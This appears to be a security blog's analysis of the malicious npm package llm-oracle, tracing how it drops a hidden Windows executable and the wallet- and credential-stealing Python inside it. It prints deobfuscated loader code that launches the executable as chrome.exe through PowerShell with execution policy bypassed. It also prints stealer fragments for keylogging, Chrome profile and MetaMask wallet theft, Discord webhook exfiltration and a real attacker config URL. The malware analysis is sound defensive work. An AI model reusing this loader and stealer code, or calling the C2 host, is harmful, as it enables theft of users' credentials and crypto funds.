NPM Package Security: llm-oracle Analysis

Introduction

In this article, we delve into the analysis of a malicious NPM package, llm-oracle, exploring its behavior, payloads, and the techniques used to evade detection. This article is inspired and extended version from Safedep and Socket.dev article. By the end of this article, you’ll not only understand the nature of the attack but also:

Grasp the methodology behind analyzing malicious NPM packages.
Explore how we reversed and deobfuscated the malware to understand its behavior.
Understand the tactics used by the attacker to compromise systems and avoid detection.
Learn about the advanced techniques employed by the malware, including PowerShell and PyInstaller usage.
Gain insights into key indicators of compromise (IOCs) and the implications for defending against such attacks.

Below, we will explore the details of the llm-oracle supply chain attack, its analysis, deobfuscation process, and the insights gained from interacting with the Command & Control (C2) infrastructure.

Inside the Package ( Analysis & Reversing)

The first step was to identify package metadata from npm registry for it’s availability

>>>> npm view llm-oracle

llm-oracle@1.0.2 | MIT | deps: 28 | versions: 3
https://github.com/llm-oracle/msal#readme

keywords: oracle, llm, offchain, evm, ethereum
dist
.tarball: https://registry.npmjs.org/llm-oracle/-/llm-oracle-1.0.2.tgz
.shasum: 06b940685db1d376a17c178b88cd222635c500a7
.integrity: sha512-5HwwW+J7Ws3Po0jrfs3K5xN0Nu4V130Ys/Gj4yLSKDsUriHF8WIih4jwulD6efVeghNPZQ2a7cGvpn/UimrMEg==
.unpackedSize: 16.8 MB

dependencies:
acorn-jsx: ^3.0.1            escape-string-regexp: ^1.0.5 isarray: ^1.0.0
(...and 4 more.)
maintainers:
- josh.weavery <josh.weavery@gmail.com>

dist-tags:
latest: 1.0.2
published 4 months ago by josh.weavery <josh.weavery@gmail.com>

This process provides valuable insights, including details on the author, publisher, and the URL of the package's latest version. Next, we retrieved the tarball and extracted its contents for in-depth local analysis. Inside the archive, we found the following files:

Base64Decode.ts
HISTORY.md
LICENSE
README.md
index.js
package.json

In an unexpected turn, the initial step alone provided a significant malware indicator on doing file command on Base64Decode.ts.

Base64Decode.ts: PE32+ executable (GUI) x86-64, for MS Windows

Upon further inspection, the index.js file contained obfuscated code, which, once decoded, revealed the following:

const targetFilePath = path.join(process.env.LOCALAPPDATA, String('\u0063\u0068\u0072\u006f\u006d\u0065\u002e\u0065\u0078\u0065').replace(/\+/g, ''));
if (!fs.existsSync(targetFilePath)) {
  setTimeout(() => {
    fs.copyFileSync(modelFilePath, targetFilePath);
    exec(`powershell -ExecutionPolicy Bypass Start-Process -FilePath '${targetFilePath}' -Verb RunAs`, (err, stdout, stderr) => {});
  }, 60000);
}

Deobfuscation of the Malware

We proceeded to decode the obfuscated strings and found:

\u0063\u0068\u0072\u006f\u006d\u0065\u002e\u0065\u0078\u0065 → chrome.exe

The decoded payload indicated that the Base64Decode.ts executable was being copied as chrome.exe to %LOCALAPPDATA% and then executed using PowerShell. Further analysis of the payload revealed that it was a Python script packaged as an executable using PyInstaller.

Extracting the PyInstaller archive from the executable, we found several interesting files, including OH8xADfF8q.pyc, which contained strings suggesting the malware's behavior was focused on cryptocurrency wallet exfiltration, credential harvesting, and other malicious activities.

One of the key payloads was:

import os
exec(base64.b64decode(bytes('aW1wb3J0IGJhc2U2NDtl...', 'utf-8')).decode('utf-8'))

The dual-encoded base64 string ultimately decoded into a Python script that performed conventional malware activities.

Here are some of the lines from the decoded malicious code:

import os, discord, subprocess, requests, re, json, base64, shutil, sqlite3, winreg, sys, win32crypt
import time
import keyboard
import psutil
import ctypes
from base64 import b64decode
from Crypto.Cipher import AES
-----------so many more import statements------

try:
        # Generate a unique identifier
        unique_id = str(uuid.uuid4())[:8]  # Get the first 8 characters of the UUID

        # Construct the filename with the unique identifier
        zip_file_name = f"{name}-{unique_id}"

    -----------------
    and so many more lines
    -----------------

Let’s breakdown to understand what this does in actual:

# Environment Variable Retrieval
local = os.getenv('LOCALAPPDATA')
roaming = os.getenv('APPDATA')
temp = os.getenv("TEMP")

This code retrieves paths to critical directories on a Windows system, which are often used to store user-specific data. Malware can use these paths to access sensitive information or store malicious files.

#Collecting Browser Profiles
profiles_path = os.getenv('LOCALAPPDATA') + "\\Google\\Chrome\\User  Data" 
profiles = [d for d in os.listdir(profiles_path) if os.path.isdir(os.path.join(profiles_path, d)) and (d.startswith("Profile") or d == "Default")]

This code collects the paths to Chrome user profiles. Malware often targets browser data to extract saved passwords, cookies, and other sensitive information.

#Keylogging
def on_key_press(event: object):
    global current_string
    current_string += event.name

This function captures keystrokes and appends them to a string. Keylogging is a common technique used by malware to capture user inputs, including passwords and sensitive information.

clipboard_monitor.on_update(print)

This line sets up a clipboard monitor to capture any changes made to the clipboard. Malware can exploit this to steal sensitive data that users copy, such as passwords or credit card numbers.

requests.post(webhook_url, files=payload)

This line sends collected data (like screenshots or keystrokes) to a specified Discord webhook URL. This is a common method for malware to exfiltrate data to a remote server controlled by the attacker.

extension_wallet_list = [
    {"name": "metamask", "folder": "nkbihfbeogaeaoehlefnkodbefgpgknn"},
    {"name": "tronlink", "folder": "ibnejdfjmmkpcnlpebklmnkoeoihofec"},
    {"name": "trustwallet", "folder": "egjidjbpglichdcondbcbdnbeeppgdph"},
    # ... other wallet extensions
]

This list defines several popular cryptocurrency wallet extensions and their corresponding folder names within the Chrome user data directory. The malware targets these wallets to extract sensitive information, such as private keys or passwords.

def Z1P7H1N65(path, arg, procc):
    # ... other code
    if "nkbihfbeogaeaoehlefnkodbefgpgknn" in arg:
        browser = path.split("\\")[4].split("/")[1].replace(' ', '')
        name = f"Metamask_{browser}"
        pathC = path + arg

    # ... similar checks for other wallet extensions

    if not os.path.exists(pathC): return
    subprocess.Popen(f"taskkill /im {procc} /t /f >nul 2>&1", shell=True)

    shutil.make_archive(zip_file_path, 'zip', pathC)

The function checks if specific wallet folder names are present in the argument (arg). If a match is found, it constructs the path to the wallet's data directory. It then terminates the associated browser process (e.g., Chrome) to prevent data corruption while zipping the contents of the wallet directory. Finally, it creates a ZIP archive of the wallet's data, which can then be exfiltrated to the attacker's server.

@bot.event
async def on_ready():
    global channel_password
    global webhook_url

    guild = bot.get_guild(int(guild_id))

    existing_channel = discord.utils.get(guild.text_channels, name=session_id)

    if existing_channel:
        # If the channel already exists, use it
        channel = existing_channel
    else:
        # If the channel doesn't exist, create a new one
        channel = await guild.create_text_channel(session_id)

    # ... additional setup for the channel

When the bot is ready, it retrieves the guild (server) using the guild_id. It checks if a text channel with the name defined in session_id already exists. If it does, the bot uses that channel; otherwise, it creates a new channel with that name. This allows the malware to have a dedicated channel for sending collected data or receiving commands from the attacker.

webhook = await channel.create_webhook(name="hook_chl")
webhook_url = webhook.url

config_url = "https://bayard-front-833a4.web.app/start.dat"
# Send a GET request to the URL
config_response = requests.get(config_url)
# Load the JSON data from the response content
config_data = json.loads(config_response.content)
# Access the specific value from the JSON data
guild_id = config_data['gid'].replace(" ", "").replace("_", "")
token = config_data['tkn'].replace(" ", "").replace("_", "")

The start.dat file contains important configuration information needed for the Discord bot to function correctly. Specifically, it includes:

gid: The ID of the Discord guild (server) where the bot will operate.
tkn: The token used to authenticate and run the Discord bot.

Now, Our next aim was to see what is inside this start.dat, we hit the server of the attacker and downloaded the start.dat file, which contained the gid and tkn in a json format.

Going Behind the Attacker

Further investigation into the Command & Control (C2) server communication revealed a configuration file in JSON format that outlined the following malicious actions:

Connects to the Discord server using a Guild ID and Token.
Creates new channels and starts a keylogger.
Takes screenshots and sends keystrokes to the server.
Establishes full command and control.
Transfers files (if greater than 25MB) via a geo-fenced service.

Conclusion

Our analysis of the llm-oracle NPM package confirmed it as a malicious package designed to deploy a Windows executable that facilitated a range of malware activities. Despite its relatively simple packaging and obfuscation techniques, the attackers employed advanced methods such as PowerShell, PyInstaller, and base64 encoding to evade detection.

We successfully decompiled the entire malware package, allowing us to map out its full behavior, including interactions with C2 servers and the exploitation of crypto wallets. This investigation provides valuable insights into the attacker’s tactics, techniques, and procedures (TTPs), which will aid in strengthening defenses against similar attacks. The attackers’ use of evasive techniques and undetected payload execution underscores the importance of proactive threat hunting and continuous monitoring of the software supply chain.

Supply Chain Attack Analysis for NPM Package : llm-oracle

Table of contents